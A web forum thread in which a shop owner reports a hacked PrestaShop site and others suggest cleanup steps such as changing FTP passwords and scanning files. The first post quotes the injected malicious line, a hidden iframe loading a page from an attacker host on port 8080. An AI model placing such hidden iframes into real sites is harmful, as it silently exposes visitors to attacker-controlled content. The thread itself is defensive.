Injection XSS in all index.php

[unformatik]

Hi

My e-commerce site was haked!

this is a sample code

echo'<iframe frameborder="no" style="margin: 0px; padding: 0px; width: 780px; height: 380px;" src="http://www.prestashop.com/rss/news.php?v='._PS_VE
<iframe src="http://[removed]:8080/index.php" width=179 height=174 style="visibility: hidden"></iframe>

may version looks like http://s*.cn:8080/index.php

how to protect the boutique
please help

[Pursuant]

How was it hacked with that code? Its PHP code there, so I don't see how it could possibly be 'hacked'. Did you install an untrusted module?

--Kevin

[Damien Lanza BRUN]

Same problem here, on old asp website (nothing to do with prestashop, but it may be useful).

Trying to find the source.

Is your website hosted on Windows or Linux platform?

Edit : found ! http://www.racingthirst.com/racyblog/?p=449

Check your PC, and all PCs that has been used to log in to your FTP account.

[Snol]

Change your ftp passwords for this and any other sites you may have, iframe attack can and will try the same passwords over and over with other sites you may have. search all files with something like notepad ++ for the same code and remove it, (usually index files) but can be any.
and most of all DONT store your ftp username and or pasword on the same pc as your local copy of site. Best to keep perhaps just some of it and remember the other 3 or 4 digits.